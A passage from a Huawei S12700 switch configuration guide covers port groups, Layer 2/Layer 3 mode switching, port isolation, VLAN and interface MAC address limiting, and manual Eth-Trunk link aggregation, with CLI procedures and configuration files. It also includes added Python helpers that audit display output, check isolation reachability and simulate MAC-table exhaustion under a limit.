Step 1 Create a port group and add GE1/0/1, GE1/0/2, and GE1/0/3 to the port group.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] port-group portgroup1 //Create a permanent port group portgroup1.
[Switch-port-group-portgroup1] group-member GE1/0/1 to GE1/0/3 //Add
GE1/0/1, GE1/0/2, and GE1/0/3 to portgroup1.

Step 2 Configure GE1/0/1, GE1/0/2, and GE1/0/3 to work in non-auto-negotiation mode, and set the
duplex mode to full-duplex and rate to 100 Mbit/s for these interfaces in a batch.
[Switch-port-group-portgroup1] undo negotiation auto //Configure interfaces to
work in non-auto-negotiation mode in a batch.
[Switch-GigabitEthernet1/0/1] undo negotiation auto
[Switch-GigabitEthernet1/0/2] undo negotiation auto
[Switch-GigabitEthernet1/0/3] undo negotiation auto
[Switch-port-group-portgroup1] duplex full //Set the duplex mode of the
interfaces to full-duplex in a batch.
[Switch-GigabitEthernet1/0/1] duplex full
[Switch-GigabitEthernet1/0/2] duplex full
[Switch-GigabitEthernet1/0/3] duplex full
[Switch-port-group-portgroup1] speed 100 //Set the rate of the interfaces to
100 Mbit/s in a batch.
[Switch-GigabitEthernet1/0/1] speed 100
[Switch-GigabitEthernet1/0/2] speed 100
[Switch-GigabitEthernet1/0/3] speed 100
[Switch-port-group-portgroup1] quit

Step 3 Verify the configuration.

Run the display interface gigabitethernet 1/0/1 command in any view to check the interface
rate and duplex mode.
[Switch] display interface gigabitethernet 1/0/1
...
Port Mode: COMMON COPPER
Speed : 100, Loopback: NONE
Duplex: FULL, Negotiation: DISABLE
Mdi : AUTO, Flow-control: DISABLE
...

The command output shows that the interface works in non-auto-negotiation mode, the rate is
100 Mbit/s, and the duplex mode is full-duplex.
Similarly, run the display interface gigabitethernet 1/0/2 and display interface
gigabitethernet 1/0/3 commands on GE1/0/2 and GE1/0/3 respectively to check interface
working information.

----End

Configuration File
Configuration file of the Switch
#
sysname Switch
#
interface GigabitEthernet1/0/1
undo negotiation auto
speed 100
#
interface GigabitEthernet1/0/2
undo negotiation auto
speed 100
#
interface GigabitEthernet1/0/3
undo negotiation auto
speed 100
#
port-group portgroup1
group-member GigabitEthernet1/0/1
group-member GigabitEthernet1/0/2
group-member GigabitEthernet1/0/3
#
return

5.3 Example for Switching an Interface Between Layer 2 and Layer 3 Modes

Introduction to Switching an Interface Between Layer 2 and Layer 3 Modes
Due to hardware restrictions of interface cards, some Ethernet interfaces work in only Layer 2
or Layer 3 mode, whereas other Ethernet interfaces can work in both Layer 2 and Layer 3
modes.

Configuration Notes
l By default, an Ethernet interface works in Layer 2 mode and belongs to VLAN 1. An
interface is not removed from VLAN 1 immediately after being switched to Layer 3
mode. It is removed from VLAN 1 only when Layer 3 protocols are Up.
l You can configure Layer 2 and Layer 3 modes of an Ethernet interface in the Ethernet
interface view or system view. When the configurations in the two views differ, the latest
configuration takes effect.
l The minimum interval between running the portswitch and undo portswitch commands
is 30 seconds. That is, after changing the mode of an Ethernet interface, you have to wait
at least 30 seconds before changing the mode again.
l If service configurations (such as the port link-type trunk configuration) exist on an
interface, you need to clear all service configurations before switching the interface
between Layer 2 and Layer 3 modes. The mode switching configuration takes effect on
an interface when only attribute configurations (such as shutdown and description
configurations) exist on the interface.
l Interfaces on the S12700 can be switched between Layer 2 and Layer 3 modes. IP
addresses can be assigned to Ethernet interfaces working in Layer 3 mode.

Networking Requirements
As shown in Figure 5-3, PC1, PC2, PC3, and PC4 are on four network segments, and
SwitchB, SwitchC, SwitchD, and SwitchE are access switches for these four network
segments, respectively. It is required that four physical Ethernet interfaces on SwitchA be
configured as gateway interfaces for these four network segments.

Figure 5-3 Networking diagram for configuring the rate and duplex mode in non-auto-negotiation mode (SwitchA: GE1/0/1 to SwitchB and PC1 on 10.10.1.0/24, GE1/0/2 to SwitchC and PC2 on 10.10.2.0/24, GE1/0/3 to SwitchD and PC3 on 10.10.3.0/24, GE1/0/4 to SwitchE and PC4 on 10.10.4.0/24)

Configuration Roadmap
The configuration roadmap is as follows:

l Switch interfaces to Layer 3 mode.
l Configure IP addresses of Layer 3 Ethernet interfaces as gateway addresses.

Procedure
Step 1 Switch interfaces to Layer 3 mode.

# Switch an interface to Layer 3 mode.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] undo portswitch
[SwitchA-GigabitEthernet1/0/1] quit

# Switch Ethernet interfaces to Layer 3 mode in a batch.
[SwitchA] undo portswitch batch gigabitethernet 1/0/2 to 1/0/4

Step 2 Configure IP addresses of Layer 3 Ethernet interfaces as gateway addresses.

# Configure the IP address of GE1/0/1 as a gateway address. The configurations of GE1/0/2,
GE1/0/3, and GE1/0/4 are similar to the configuration of GE1/0/1, and are not mentioned
here. For details, see the configuration files.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] ip address 10.10.1.1 24
[SwitchA-GigabitEthernet1/0/1] quit

Step 3 Run the display interface gigabitethernet 1/0/1 command in any view to check the interface
working mode.
[SwitchA] display interface gigabitethernet 1/0/1
...
Description:
Route Port,The Maximum Frame Length is 9216
Internet Address is 10.10.1.1/24
...

If Switch Port is displayed, the interface works in Layer 2 mode. If Route Port is displayed,
the interface works in Layer 3 mode. The preceding command output shows that the interface
works in Layer 3 mode.
Similarly, run the display interface gigabitethernet 1/0/2, display interface gigabitethernet
1/0/3, and display interface gigabitethernet 1/0/4 commands on GE1/0/2, GE1/0/3, and
GE1/0/4 respectively to check the interface working mode.
----End
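Sections 5.1, 5.2 and 5.3 each end by reading a few lines of display interface output and comparing them with the intended state. The following Python is an added example (not from the Huawei document) that does that comparison mechanically, so it can be re-run after a change to catch drift such as auto-negotiation being re-enabled on a server port. The output fragments are constructed copies of what the page shows; the drifted fragment is constructed to exercise the failure path.

```python
import re

# Constructed copies of the display interface fragments shown in sections 5.1 to 5.3.
OUTPUT_5_1 = """Port Mode: FORCE COPPER
Speed : 1000, Loopback: NONE
Duplex: FULL, Negotiation: ENABLE
Mdi : AUTO, Flow-control: DISABLE"""
OUTPUT_5_2 = """Port Mode: COMMON COPPER
Speed : 100, Loopback: NONE
Duplex: FULL, Negotiation: DISABLE
Mdi : AUTO, Flow-control: DISABLE"""
OUTPUT_5_3 = """Description:
Route Port,The Maximum Frame Length is 9216
Internet Address is 10.10.1.1/24"""
# Constructed drifted output: a server port negotiated back to 1000 Mbit/s.
OUTPUT_5_2_DRIFT = """Port Mode: COMMON COPPER
Speed : 1000, Loopback: NONE
Duplex: FULL, Negotiation: ENABLE"""

# 'Name: value' pairs separated by commas; 'Speed : 100' has a space before the colon.
_KV = re.compile(r"([A-Za-z][A-Za-z -]*?)\s*:\s*([^,]+)")
_ADDR = re.compile(r"Internet Address is (\S+)")


def parse_display_interface(text: str) -> dict:
    """Flatten a display interface fragment into {UPPER-CASE NAME: value}."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(("Switch Port", "Route Port")):
            fields["PORT-TYPE"] = line.split(",")[0]  # Layer 2 vs Layer 3 mode
            continue
        m = _ADDR.search(line)
        if m:
            fields["INTERNET-ADDRESS"] = m.group(1)
            continue
        for name, value in _KV.findall(line):
            fields[name.strip().upper()] = value.strip()
    return fields


def audit(fields: dict, expected: dict) -> list:
    """One message per expectation the parsed output does not meet (empty list = compliant)."""
    problems = []
    for name, want in expected.items():
        got = fields.get(name.upper())
        if got is None:
            problems.append("%s: not present in output" % name)
        elif got.upper() != str(want).upper():
            problems.append("%s: expected %s, got %s" % (name, want, got))
    return problems


# Expected state, taken from what each procedure says the output must show.
EXPECT_5_1 = {"Port Mode": "FORCE COPPER"}  # combo-port copper
EXPECT_5_2 = {"Speed": "100", "Duplex": "FULL", "Negotiation": "DISABLE"}
EXPECT_5_3 = {"Port-Type": "Route Port", "Internet-Address": "10.10.1.1/24"}
```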

Configuration File
Configuration file of SwitchA
#
sysname SwitchA
#
interface GigabitEthernet1/0/1
undo portswitch
ip address 10.10.1.1 255.255.255.0
#
interface GigabitEthernet1/0/2
undo portswitch
ip address 10.10.2.1 255.255.255.0
#
interface GigabitEthernet1/0/3
undo portswitch
ip address 10.10.3.1 255.255.255.0
#
interface GigabitEthernet1/0/4
undo portswitch
ip address 10.10.4.1 255.255.255.0
#
return

5.4 Example for Configuring Port Isolation

Introduction to Port Isolation
To implement Layer 2 isolation between interfaces, you can add each interface to a different
VLAN. This method, however, wastes VLAN resources. Port isolation can isolate interfaces
in the same VLAN, and a port isolation group can effectively implement Layer 2 isolation
between these interfaces. Port isolation provides secure and flexible networking solutions.

The port isolation mode can be Layer 2 isolation and Layer 3 interworking or Layer 2 and
Layer 3 isolation.
l To isolate broadcast packets in the same VLAN but allow users connecting to different
interfaces to communicate at Layer 3, you can set the port isolation mode to Layer 2
isolation and Layer 3 interworking.
l To prevent interfaces in the same VLAN from communicating at both Layer 2 and Layer
3, you can set the port isolation mode to Layer 2 and Layer 3 isolation.

Configuration Notes
l The S12700 supports Layer 2 isolation and Layer 3 interworking.
l The S12700 supports Layer 2 and Layer 3 isolation.
l Do not add both the uplink and downlink interfaces to the same port isolation group
unless it is required. Otherwise, the uplink and downlink interfaces cannot communicate.

Networking Requirements
An R&D office of a company contains employees from the company, partner company A, and
partner company B. As shown in Figure 5-4, PC1 and PC2 are used by two employees from
partner companies A and B respectively, and PC3 is used by an R&D employee from the
company. The requirements are as follows:

l VLAN resources need to be saved.
l Employees from partner companies A and B cannot communicate with each other.
l Employees from partner companies A and B can communicate with the company's
employees.

Figure 5-4 Networking diagram for configuring port isolation (Router above the Switch; GE1/0/1 and GE1/0/2 in the port isolation group, GE1/0/3 outside it; PC1 10.10.10.1/24 employee of partner company A, PC2 10.10.10.2/24 employee of partner company B, PC3 10.10.10.3/24 employee of the company; all in VLAN 10)

Configuration Roadmap
The configuration roadmap is as follows:
1. Add interfaces to a VLAN.
2. Add the interfaces to a port isolation group to implement Layer 2 isolation between these
interfaces. The default port isolation mode is Layer 2 isolation and Layer 3 interworking.

Procedure
Step 1 Configure port isolation.
# Configure port isolation on GE1/0/1.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan 10
[Switch-vlan10] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access //Set the interface type of
GE1/0/1 to access.
[Switch-GigabitEthernet1/0/1] port default vlan 10 //Add GE1/0/1 to VLAN 10.
[Switch-GigabitEthernet1/0/1] port-isolate enable //By default, the interface
is added to port isolation group 1 and the port isolation mode is Layer 2
isolation and Layer 3 interworking. You can run the port-isolate mode all command
to set the port isolation mode to Layer 2 and Layer 3 isolation.
[Switch-GigabitEthernet1/0/1] quit

# Configure port isolation on GE1/0/2.
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access //Set the interface type of
GE1/0/2 to access.
[Switch-GigabitEthernet1/0/2] port default vlan 10 //Add GE1/0/2 to VLAN 10.
[Switch-GigabitEthernet1/0/2] port-isolate enable //By default, the interface
is added to port isolation group 1 and the port isolation mode is Layer 2
isolation and Layer 3 interworking. You can run the port-isolate mode all command
to set the port isolation mode to Layer 2 and Layer 3 isolation.
[Switch-GigabitEthernet1/0/2] quit

# Add GE1/0/3 to VLAN 10.
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] port link-type access //Set the interface type of
GE1/0/3 to access.
[Switch-GigabitEthernet1/0/3] port default vlan 10 //Add GE1/0/3 to VLAN 10.
[Switch-GigabitEthernet1/0/3] quit

Step 2 Verify the configuration.
# PC1 and PC2 cannot communicate with each other.
# PC1 and PC3 can communicate with each other.
# PC2 and PC3 can communicate with each other.
----End

Configuration File
Configuration file of the Switch
#
sysname Switch


#
vlan batch 10
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
port-isolate enable group 1
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 10
port-isolate enable group 1
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 10
#
return
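The following Python script is an added example, not Huawei code: it parses a configuration
file in the format shown above and derives which access interfaces can still exchange Layer 2
frames after port isolation is applied, and it flags an isolation group that mixes uplink and
downlink interfaces (the case the Configuration Notes warn about). The regular expressions
and the uplink list are assumptions made for the example.

```python
"""Layer 2 reachability check derived from a port isolation configuration.

Added example (not Huawei code). It parses the 'interface ... / port-isolate
enable group N' blocks of a configuration file in the format shown above
and decides whether two access interfaces can exchange Layer 2 frames:
interfaces in the same port isolation group are isolated, interfaces in
the same VLAN are otherwise reachable. Only the Layer 2 isolation and
Layer 3 interworking mode used in the example is modelled.
"""
import re
from collections import defaultdict

# Constructed sample: the configuration file of the Switch from the example above.
SAMPLE_CONFIG = """\
#
sysname Switch
#
vlan batch 10
#
interface GigabitEthernet1/0/1
 port link-type access
 port default vlan 10
 port-isolate enable group 1
#
interface GigabitEthernet1/0/2
 port link-type access
 port default vlan 10
 port-isolate enable group 1
#
interface GigabitEthernet1/0/3
 port link-type access
 port default vlan 10
#
return
"""


def parse_interfaces(config_text):
    """Return {interface name: {"vlan": int or None, "isolate_group": int or None}}."""
    interfaces = {}
    current = None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line == "#":
            current = None                      # '#' ends the current view
            continue
        m = re.match(r"interface (\S+)$", line)
        if m:
            current = m.group(1)
            interfaces[current] = {"vlan": None, "isolate_group": None}
            continue
        if current is None:
            continue                            # global command, not an interface one
        m = re.match(r"port default vlan (\d+)$", line)
        if m:
            interfaces[current]["vlan"] = int(m.group(1))
            continue
        m = re.match(r"port-isolate enable(?: group (\d+))?$", line)
        if m:
            # 'port-isolate enable' without a group number means group 1 (see above)
            interfaces[current]["isolate_group"] = int(m.group(1) or 1)
    return interfaces


def can_talk_layer2(interfaces, a, b):
    """True if frames can be switched between access interfaces a and b."""
    ia, ib = interfaces[a], interfaces[b]
    if ia["vlan"] is None or ia["vlan"] != ib["vlan"]:
        return False                            # no common VLAN, no Layer 2 path
    ga, gb = ia["isolate_group"], ib["isolate_group"]
    if ga is not None and ga == gb:
        return False                            # same isolation group: isolated
    return True


def isolated_pairs(interfaces):
    """All unordered pairs that share a VLAN but are isolated from each other."""
    names = sorted(interfaces)
    return sorted((a, b) for i, a in enumerate(names) for b in names[i + 1:]
                  if interfaces[a]["vlan"] == interfaces[b]["vlan"]
                  and not can_talk_layer2(interfaces, a, b))


def uplink_downlink_conflicts(interfaces, uplinks):
    """Isolation groups holding both an uplink and a downlink interface; the
    configuration note above warns that such a group cuts the downlinks off."""
    groups = defaultdict(set)
    for name, attrs in interfaces.items():
        if attrs["isolate_group"] is not None:
            groups[attrs["isolate_group"]].add(name)
    uplinks = set(uplinks)
    return {g for g, members in groups.items()
            if members & uplinks and members - uplinks}


if __name__ == "__main__":
    ifs = parse_interfaces(SAMPLE_CONFIG)
    print("isolated pairs:", isolated_pairs(ifs))
    print("groups mixing uplink GE1/0/3 with downlinks:",
          uplink_downlink_conflicts(ifs, ["GigabitEthernet1/0/3"]))
```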

Related Content
Videos
Configure Port Isolation.


6 Typical Ethernet Switching Configuration

About This Chapter

6.1 Typical MAC Configuration
6.2 Link Aggregation Configuration
6.3 Typical VLAN Configuration
6.4 Typical QinQ Configuration
6.5 Typical Loopback Detection Configuration


6.1 Typical MAC Configuration

6.1.1 Example for Configuring MAC Address Limiting in a VLAN


Overview of MAC Address Limiting in a VLAN
The switch limits the number of MAC address entries based on VLANs or interfaces. In
offices where clients seldom change, you can configure MAC address limiting to control user
access. If hackers forge a large number of packets with different source MAC addresses and
send the packets to the device, finite MAC address entries in the MAC address table of the
device may be exhausted. When the MAC address table is full, the device cannot learn source
MAC addresses of valid packets. As a result, the device broadcasts the valid packets, wasting
bandwidth resources.
Compared with MAC address limiting on an interface, MAC address limiting in a VLAN can
limit the number of MAC address entries on multiple interfaces in a VLAN.

Configuration Notes
l After the port-security enable command is configured on an interface, MAC address
limiting cannot take effect on the interface. Do not configure port security and MAC
address limiting on the same interface simultaneously.
l This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-1, user network 1 is connected to GE1/0/1 of the switch through
LSW1, user network 2 is connected to GE1/0/2 of the switch through LSW2, and GE1/0/1
and GE1/0/2 belong to VLAN 2. To control the number of access users, configure MAC
address limiting in VLAN 2.

Figure 6-1 Networking of MAC address limiting in a VLAN

[Figure: the Switch connects upstream to the network; GE1/0/1 connects to LSW1 (user
network 1) and GE1/0/2 connects to LSW2 (user network 2); both interfaces are in VLAN 2]


Configuration Roadmap
The configuration roadmap is as follows:
1. Create a VLAN and add interfaces to the VLAN to implement Layer 2 forwarding.
2. Configure MAC address limiting in a VLAN to prevent MAC address attacks and
control the number of access users.

Procedure
Step 1 Create VLAN 2 and add GE1/0/1 and GE1/0/2 to VLAN 2.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 2
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk //Configure the link type of
the interface as trunk.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 //Add GE1/0/1 to
VLAN 2.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2 //The configuration of GE1/0/2 is
similar to the configuration of GE1/0/1.
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 2
[Switch-GigabitEthernet1/0/2] quit

Step 2 Configure the following MAC address limiting rule in VLAN 2: A maximum of 100 MAC
addresses can be learned. When the number of learned MAC address entries reaches the limit,
the device forwards the packets with new source MAC address entries and generates an alarm.
[Switch] vlan 2
[Switch-vlan2] mac-limit maximum 100 action forward //The default action taken
for packets in different versions is different. You are advised to manually
configure the action. The alarm function is enabled by default, so you do not
need to configure the alarm function manually.
[Switch-vlan2] quit

Step 3 Verify the configuration.
# Run the display mac-limit command in any view to check whether the MAC address
limiting rule is successfully configured.
[Switch] display mac-limit
MAC limit is enabled
Total MAC limit rule count : 1

PORT       VLAN/VSI   SLOT   Maximum   Rate(ms)   Action    Alarm
----------------------------------------------------------------------------
-          2          -      100       -          forward   enable

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
vlan batch 2
#
vlan 2
mac-limit maximum 100 action forward
#


interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2
#
return

6.1.2 Example for Configuring MAC Address Limiting on an Interface

Overview of MAC Address Limiting on an Interface
The switch limits the number of MAC address entries based on VLANs or interfaces. In
offices where clients seldom change, you can configure MAC address limiting to control user
access. If hackers forge a large number of packets with different source MAC addresses and
send the packets to the device, finite MAC address entries in the MAC address table of the
device may be exhausted. When the MAC address table is full, the device cannot learn source
MAC addresses of valid packets. As a result, the device broadcasts the valid packets, wasting
bandwidth resources.
Compared with MAC address limiting in a VLAN, MAC address limiting on an interface is
applicable in scenarios where users connected to an interface in medium-scale and small-scale
enterprises are fixed and seldom change.
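The following Python model is an added example, not Huawei code, for the MAC address table
behaviour described in the overviews of 6.1.1 and 6.1.2: it shows a flood of forged source
MACs exhausting a small constructed table, and the same flood confined by a limit applied to
a VLAN or to an interface, with the forward and discard actions. The table capacity, MAC
values and port names are constructed for the demonstration.

```python
"""Model of MAC address learning under a per-VLAN or per-interface limit.

Added example (not Huawei code). It models the behaviour the two overviews
above describe: the MAC address table is finite, a flood of frames with
forged source MACs fills it, and hosts that can no longer be learned have
their traffic flooded. A 'mac-limit maximum N action forward|discard' rule
caps learning in one scope (a VLAN or an interface), so the flood cannot
consume the table entries other VLANs and interfaces depend on. An alarm
is recorded whenever the limit is hit, as the page says happens by default.
Capacity 200 and the MAC values are constructed for the demonstration.
"""


class MacTable:
    def __init__(self, capacity):
        self.capacity = capacity        # finite hardware table size
        self.entries = {}               # (vlan, mac) -> learning port
        self.limits = {}                # ("vlan", id) or ("port", name) -> (max, action)
        self.alarms = []                # (scope, mac) each time a limit is hit

    def set_limit(self, scope, maximum, action):
        """mac-limit maximum <maximum> action <forward|discard> in that scope."""
        if action not in ("forward", "discard"):
            raise ValueError("action must be forward or discard")
        self.limits[scope] = (maximum, action)

    def count_in_scope(self, scope):
        kind, value = scope
        if kind == "vlan":
            return sum(1 for vlan, _mac in self.entries if vlan == value)
        return sum(1 for port in self.entries.values() if port == value)

    def receive(self, vlan, src_mac, in_port):
        """Learn src_mac from a frame; return (learning result, frame action)."""
        key = (vlan, src_mac)
        if key in self.entries:
            self.entries[key] = in_port             # refresh existing entry
            return "known", "forward"
        for scope in (("vlan", vlan), ("port", in_port)):
            if scope in self.limits:
                maximum, action = self.limits[scope]
                if self.count_in_scope(scope) >= maximum:
                    self.alarms.append((scope, src_mac))
                    return "limited", action        # not learned; action applies
        if len(self.entries) >= self.capacity:
            return "full", "forward"                # table exhausted, not learned
        self.entries[key] = in_port
        return "learned", "forward"

    def lookup(self, vlan, dst_mac):
        """Egress port for dst_mac, or None when the frame has to be flooded."""
        return self.entries.get((vlan, dst_mac))


# Constructed flood: 500 distinct forged source MACs arriving on GE1/0/1 in VLAN 2.
FORGED_SOURCES = ["0200-0000-%04x" % i for i in range(500)]
VALID_HOST = "0011-2233-4455"            # constructed legitimate host in VLAN 10


def run_scenario(limit_scope=None, maximum=100, action="forward", capacity=200):
    """Flood VLAN 2 via GE1/0/1, then see whether a host on GE1/0/2 in VLAN 10
    can still be learned (unicast) or ends up flooded. Returns a summary dict."""
    table = MacTable(capacity)
    if limit_scope is not None:
        table.set_limit(limit_scope, maximum, action)
    flood_actions = [table.receive(2, mac, "GE1/0/1")[1] for mac in FORGED_SOURCES]
    valid_result, _ = table.receive(10, VALID_HOST, "GE1/0/2")
    return {
        "entries_in_vlan2": table.count_in_scope(("vlan", 2)),
        "valid_host_learned": valid_result == "learned",
        "valid_host_unicast": table.lookup(10, VALID_HOST) is not None,
        "forged_frames_discarded": flood_actions.count("discard"),
        "alarms": len(table.alarms),
    }


if __name__ == "__main__":
    print("no limit:         ", run_scenario())
    print("VLAN 2, forward:  ", run_scenario(("vlan", 2), 100, "forward"))
    print("GE1/0/1, discard: ", run_scenario(("port", "GE1/0/1"), 100, "discard"))
```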

Configuration Notes
l After port-security enable is configured on an interface, MAC address limiting cannot
be configured on the interface.
l This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-2, user network 1 and user network 2 connect to the switch through the
LSW, and GE1/0/1 of the switch connects to the LSW. User network 1 and user network 2
belong to VLAN 10 and VLAN 20 respectively. On the switch, MAC address limiting can be
configured on GE1/0/1 to control the number of access users.


Figure 6-2 Networking of MAC address limiting on an interface

[Figure: the Switch connects upstream to the network; GE1/0/1 connects to the LSW, behind
which are user network 1 (VLAN 10) and user network 2 (VLAN 20)]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs and add interfaces to the VLANs to implement Layer 2 forwarding.
2. Configure MAC address limiting on an interface to control the number of access users.

Procedure
Step 1 Create VLAN 10 and VLAN 20 and add GE1/0/1 to VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 //Create VLAN 10 and VLAN 20.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk //Configure the link type of
the interface as trunk.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 //Add GE1/0/1 to
VLAN 10 and VLAN 20.
[Switch-GigabitEthernet1/0/1] quit

Step 2 Configure a MAC address limiting rule on GE1/0/1: A maximum of 100 MAC address entries
can be learned. When the number of learned MAC address entries reaches the limit, the
device discards the packets with new source MAC address entries and generates an alarm.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] mac-limit maximum 100 action discard //The
default action taken for packets in different versions is different. You are
advised to manually specify the action. The alarm function is enabled by default,
so you do not need to specify it manually.
[Switch-GigabitEthernet1/0/1] quit

Step 3 Verify the configuration.
# Run the display mac-limit command in any view to check whether the MAC address
limiting rule is successfully configured.


[Switch] display mac-limit
MAC limit is enabled
Total MAC limit rule count : 1

PORT       VLAN/VSI   SLOT   Maximum   Rate(ms)   Action    Alarm
----------------------------------------------------------------------------
GE1/0/1    -          -      100       -          discard   enable

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
vlan batch 10 20
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
mac-limit maximum 100
#
return

6.2 Link Aggregation Configuration

6.2.1 Example for Configuring Link Aggregation in Manual Mode When Switches Are Directly
Connected

Link Aggregation in Manual Mode
Ethernet link aggregation bundles multiple physical links to form a logical link to increase
link bandwidth. Link aggregation can work in manual mode or Link Aggregation Control
Protocol (LACP) mode.
In manual mode, you must manually create an Eth-Trunk and add member interfaces to the
Eth-Trunk. In this mode, LACP is not required. If a high link bandwidth between two directly
connected devices is required but the remote device does not support the LACP protocol, you
can use the manual mode. The manual mode can increase bandwidth, enhance reliability, and
implement load balancing.
In manual mode, all active links forward data and load balance traffic.

Configuration Notes
l Member interfaces of an Eth-Trunk must use the same Ethernet type and rate.
l Both devices of the Eth-Trunk must use the same number of physical interfaces,
interface rate, duplex mode, and flow control mode.
l If an interface of the local device is added to an Eth-Trunk, an interface of the remote
device directly connected to the interface of the local device must also be added to an
Eth-Trunk so that the two ends can communicate.
l Both devices of an Eth-Trunk must use the same link aggregation mode.


l This example applies to all versions and products.

Networking Requirements
As shown in Figure 6-3, SwitchA and SwitchB connect to devices in VLAN 10 and VLAN
20 through Ethernet links, and heavy traffic is transmitted between SwitchA and SwitchB.

SwitchA and SwitchB can provide higher link bandwidth to implement inter-VLAN
communication. Data transmission and link reliability need to be ensured.

Figure 6-3 Networking for configuring link aggregation in manual mode

[Figure: SwitchA and SwitchB are connected by Eth-Trunk 1, made up of GE1/0/1, GE1/0/2 and
GE1/0/3 on each switch; GE1/0/4 of each switch connects to VLAN 10 and GE1/0/5 of each
switch connects to VLAN 20]

Configuration Roadmap
The configuration roadmap is as follows:

1. Create an Eth-Trunk and add member interfaces to the Eth-Trunk to increase link
bandwidth.
2. Create VLANs and add interfaces to the VLANs.
3. Set the load balancing mode to ensure that traffic is load balanced between member
interfaces of the Eth-Trunk and enhance reliability.

Procedure
Step 1 Create an Eth-Trunk on SwitchA and SwitchB and add member interfaces to the Eth-Trunk.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] interface eth-trunk 1 //Create Eth-Trunk 1.
[SwitchA-Eth-Trunk1] trunkport gigabitethernet 1/0/1 to 1/0/3 //Add GE1/0/1,
GE1/0/2, and GE1/0/3 to Eth-Trunk 1.
[SwitchA-Eth-Trunk1] quit
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] interface eth-trunk 1 //Create Eth-Trunk 1.
[SwitchB-Eth-Trunk1] trunkport gigabitethernet 1/0/1 to 1/0/3 //Add GE1/0/1,
GE1/0/2, and GE1/0/3 to Eth-Trunk 1.
[SwitchB-Eth-Trunk1] quit

Step 2 Create VLANs and add interfaces to the VLANs.

# Create VLAN 10 and VLAN 20 and add interfaces to VLAN 10 and VLAN 20. The
configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned
here.


[SwitchA] vlan batch 10 20
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] port link-type trunk //Configure the interface
as a trunk interface. The default link type of an interface is not trunk.
[SwitchA-GigabitEthernet1/0/4] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/4] quit
[SwitchA] interface gigabitethernet 1/0/5
[SwitchA-GigabitEthernet1/0/5] port link-type trunk //Configure the interface
as a trunk interface. The default link type of an interface is not trunk.
[SwitchA-GigabitEthernet1/0/5] port trunk allow-pass vlan 20
[SwitchA-GigabitEthernet1/0/5] quit

# Configure Eth-Trunk 1 to allow packets from VLAN 10 and VLAN 20 to pass through. The
configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned
here.
[SwitchA] interface eth-trunk 1
[SwitchA-Eth-Trunk1] port link-type trunk //Configure the interface as a trunk
interface. The default link type of an interface is not trunk.
[SwitchA-Eth-Trunk1] port trunk allow-pass vlan 10 20
[SwitchA-Eth-Trunk1] quit

Step 3 Set the load balancing mode of Eth-Trunk 1. The configuration of SwitchB is similar to the
configuration of SwitchA, and is not mentioned here.
[SwitchA] interface eth-trunk 1
[SwitchA-Eth-Trunk1] load-balance src-dst-mac //Configure load balancing based
on the source and destination MAC addresses on Eth-Trunk 1.
[SwitchA-Eth-Trunk1] quit

Step 4 Verify the configuration.
Run the display eth-trunk 1 command in any view to check whether the Eth-Trunk is created
and whether member interfaces are added.
[SwitchA] display eth-trunk 1
Eth-Trunk1's state information is:
WorkingMode: NORMAL Hash arithmetic: According to SA-XOR-DA
Least Active-linknumber: 1 Max Bandwidth-affected-linknumber: 8
Operate status: up Number Of Up Port In Trunk: 3
--------------------------------------------------------------------------------
PortName Status Weight
GigabitEthernet1/0/1 Up 1
GigabitEthernet1/0/2 Up 1
GigabitEthernet1/0/3 Up 1

The preceding information shows that Eth-Trunk 1 contains three member interfaces:
GigabitEthernet1/0/1, GigabitEthernet1/0/2, and GigabitEthernet1/0/3. The member interface
status is Up and the value of Operate status of Eth-Trunk 1 is up.

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 20
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 10 20
load-balance src-dst-mac
#
interface GigabitEthernet1/0/1
eth-trunk 1


#
interface GigabitEthernet1/0/2
eth-trunk 1
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/5
port link-type trunk
port trunk allow-pass vlan 20
#
return
